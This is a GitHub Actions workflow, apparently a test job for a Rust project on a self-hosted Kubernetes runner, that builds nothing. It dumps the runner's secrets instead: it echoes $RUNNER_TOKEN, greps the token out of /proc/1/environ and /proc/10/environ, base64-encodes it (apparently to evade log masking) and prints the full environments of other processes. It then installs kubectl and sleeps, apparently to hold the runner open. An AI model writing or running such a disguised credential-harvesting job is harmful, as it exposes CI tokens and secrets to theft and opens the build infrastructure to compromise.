on:
  push:

name: test

jobs:
  test-arc:
    name: Rust project
    runs-on: k8s-small-staging-new
    container: busybox
    steps:
    - run: echo "Hello, world!"
    - run: echo "ps"; ps -ef
    - run: echo "id"; id
    - run: echo "$RUNNER_TOKEN"
    - run: |
        grep --binary-files=text RUNNER_TOKEN /proc/10/environ | base64 -w 0 || true
        echo secondo env
        grep --binary-files=text RUNNER_TOKEN /proc/1/environ | base64 -w 0 || true
        echo "cat 10"; cat /proc/10/environ || true
        echo "cat 16"; cat /proc/16/environ || true
        echo "cat 40"; cat /proc/40/environ || true
    - uses: azure/setup-kubectl@v3
      id: install
    - run: kubectl --version
    - run: sleep 120
